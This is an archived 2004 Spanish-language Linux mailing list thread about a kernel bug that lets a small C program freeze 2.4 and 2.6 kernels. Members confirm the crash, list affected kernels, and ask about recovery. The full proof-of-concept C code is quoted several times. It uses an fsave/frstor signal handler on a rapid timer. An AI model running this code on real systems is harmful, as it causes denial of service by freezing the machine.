Gustavo Chaín wrote:
>On Sat, 12 Jun 2004 14:14:56 -0400
>Gustavo Chaín <[EMAIL PROTECTED]> wrote:
>
>
>
>> El bug permite q un simple programa en C bloquee el sistema, afecta kernels
>> 2.4.2x and 2.6.x, el exploit fue reportado como un "gcc bug"
>>
>>Código
>>
>> #include <sys/time.h>
>> #include <signal.h>
>> #include <unistd.h>
>>
>> static void Handler(int ignore)
>> {
>> char fpubuf[108];
>> __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
>> write(2, "*", 1);
>> __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
>> }
>>
>> int main(int argc, char *argv[])
>> {
>> struct itimerval spec;
>> signal(SIGALRM, Handler);
>> spec.it_interval.tv_sec=0;
>> spec.it_interval.tv_usec=100;
>> spec.it_value.tv_sec=0;
>> spec.it_value.tv_usec=100;
>> setitimer(ITIMER_REAL, &spec, NULL);
>> while(1)
>> write(1, ".", 1);
>>
>> return 0;
>> }
>>
>> El bug se "manifiesta si es compilado con las versiones 3.2 o 3.3 de gcc
>>
>>Los kernels q se salvan...
>>
>>Aqui el código no hace nada, salvo enviar un error de excepcion en el coma
>>flotante.
>>
>> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
>> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille
>> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
>> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
>>
>>No está muy claro pq los parches de gentoo para kernels 2.4.26 estan a salvo
>>de esto (fueron liberado antes de la publicacion del bug). Segun el redactor
>>del articulo lo probo y no tuvo problemas
>>
>>I assumed this bug was no serious threat before everyone I asked to test this
>>code confermed that it did, in fact, froze their systems. When I started
>>testing kernels I found that every kernel I tried, 2.4.xx and 2.6.xx, are
>>affected except the ones I had already installed on my system. Even Linux
>>2.4.26-gentoo-r1 crashes.
>>
>>blabla ...
>>
>>al parecer la solucion es compilar 2.4.25 y parchar con gentoo.
>>
>>
>>
>>pseudo traducido de:
>>http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en
>>
>>
>>
>>
>
>-_- ' funciona
>
>
>
Lo Probe en un kernel con parches de debian en la distribución Unstable
version 2.4.26, y el sistema se paraliza por completo.
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL:
https://listas.inf.utfsm.cl/pipermail/linux/attachments/20040612/5542e10a/attachment-0001.htm
From [EMAIL PROTECTED] Sat Jun 12 14:56:08 2004
From: [EMAIL PROTECTED] (Felipe Covarrubias Hooper)
Date: Sat Jun 12 15:01:25 2004
Subject: Kernel Crash-Exploit descubierto
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Gustavo Chaín wrote:
>On Sat, 12 Jun 2004 14:14:56 -0400
>Gustavo Chaín <[EMAIL PROTECTED]> wrote:
>
>
>
>> El bug permite q un simple programa en C bloquee el sistema, afecta kernels
>> 2.4.2x and 2.6.x, el exploit fue reportado como un "gcc bug"
>>
>>Código
>>
>> #include <sys/time.h>
>> #include <signal.h>
>> #include <unistd.h>
>>
>> static void Handler(int ignore)
>> {
>> char fpubuf[108];
>> __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
>> write(2, "*", 1);
>> __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
>> }
>>
>> int main(int argc, char *argv[])
>> {
>> struct itimerval spec;
>> signal(SIGALRM, Handler);
>> spec.it_interval.tv_sec=0;
>> spec.it_interval.tv_usec=100;
>> spec.it_value.tv_sec=0;
>> spec.it_value.tv_usec=100;
>> setitimer(ITIMER_REAL, &spec, NULL);
>> while(1)
>> write(1, ".", 1);
>>
>> return 0;
>> }
>>
>> El bug se "manifiesta si es compilado con las versiones 3.2 o 3.3 de gcc
>>
>>Los kernels q se salvan...
>>
>>Aqui el código no hace nada, salvo enviar un error de excepcion en el coma
>>flotante.
>>
>> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
>> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille
>> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
>> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
>>
>>No está muy claro pq los parches de gentoo para kernels 2.4.26 estan a salvo
>>de esto (fueron liberado antes de la publicacion del bug). Segun el redactor
>>del articulo lo probo y no tuvo problemas
>>
>>I assumed this bug was no serious threat before everyone I asked to test this
>>code confermed that it did, in fact, froze their systems. When I started
>>testing kernels I found that every kernel I tried, 2.4.xx and 2.6.xx, are
>>affected except the ones I had already installed on my system. Even Linux
>>2.4.26-gentoo-r1 crashes.
>>
>>blabla ...
>>
>>al parecer la solucion es compilar 2.4.25 y parchar con gentoo.
>>
>>
>>
>>pseudo traducido de:
>>http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en
>>
>>
>>
>>
>
>-_- ' funciona
>
>
>
Lo Probe en un kernel con parches de debian en la distribución Unstable,
kernel version 2.4.26, y el sistema se paraliza por completo.
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL:
https://listas.inf.utfsm.cl/pipermail/linux/attachments/20040612/d70409e7/attachment.htm
From [EMAIL PROTECTED] Sat Jun 12 15:20:52 2004
From: [EMAIL PROTECTED] (Gustavo =?ISO-8859-1?Q?Cha=EDn?=)
Date: Sat Jun 12 15:21:09 2004
Subject: Kernel Crash-Exploit descubierto
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
On Sat, 12 Jun 2004 14:56:08 -0400
Felipe Covarrubias Hooper <[EMAIL PROTECTED]> wrote:
> Gustavo Chaín wrote:
>
> >On Sat, 12 Jun 2004 14:14:56 -0400
> >Gustavo Chaín <[EMAIL PROTECTED]> wrote:
> >
> >
> >
> >> El bug permite q un simple programa en C bloquee el sistema, afecta
> >> kernels 2.4.2x and 2.6.x, el exploit fue reportado como un "gcc bug"
> >>
> >>Código
> >>
> >> #include <sys/time.h>
> >> #include <signal.h>
> >> #include <unistd.h>
> >>
> >> static void Handler(int ignore)
> >> {
> >> char fpubuf[108];
> >> __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
> >> write(2, "*", 1);
> >> __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
> >> }
> >>
> >> int main(int argc, char *argv[])
> >> {
> >> struct itimerval spec;
> >> signal(SIGALRM, Handler);
> >> spec.it_interval.tv_sec=0;
> >> spec.it_interval.tv_usec=100;
> >> spec.it_value.tv_sec=0;
> >> spec.it_value.tv_usec=100;
> >> setitimer(ITIMER_REAL, &spec, NULL);
> >> while(1)
> >> write(1, ".", 1);
> >>
> >> return 0;
> >> }
> >>
> >> El bug se "manifiesta si es compilado con las versiones 3.2 o 3.3 de gcc
> >>
> >>Los kernels q se salvan...
> >>
> >>Aqui el código no hace nada, salvo enviar un error de excepcion en el coma
> >>flotante.
> >>
> >> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
> >> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille
> >> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
> >> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
> >>
> >>No está muy claro pq los parches de gentoo para kernels 2.4.26 estan a
> >>salvo de esto (fueron liberado antes de la publicacion del bug). Segun el
> >>redactor del articulo lo probo y no tuvo problemas
> >>
> >>I assumed this bug was no serious threat before everyone I asked to test
> >>this code confermed that it did, in fact, froze their systems. When I
> >>started testing kernels I found that every kernel I tried, 2.4.xx and
> >>2.6.xx, are affected except the ones I had already installed on my system.
> >>Even Linux 2.4.26-gentoo-r1 crashes.
> >>
> >>blabla ...
> >>
> >>al parecer la solucion es compilar 2.4.25 y parchar con gentoo.
> >>
> >>
> >>
> >>pseudo traducido de:
> >>http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en
> >>
> >>
> >>
> >>
> >
> >-_- ' funciona
> >
> >
> >
> Lo Probe en un kernel con parches de debian en la distribución Unstable,
> kernel version 2.4.26, y el sistema se paraliza por completo.
>
pero una vez paralizado què?, reinicias y todo como si nunca hubiera pasado?
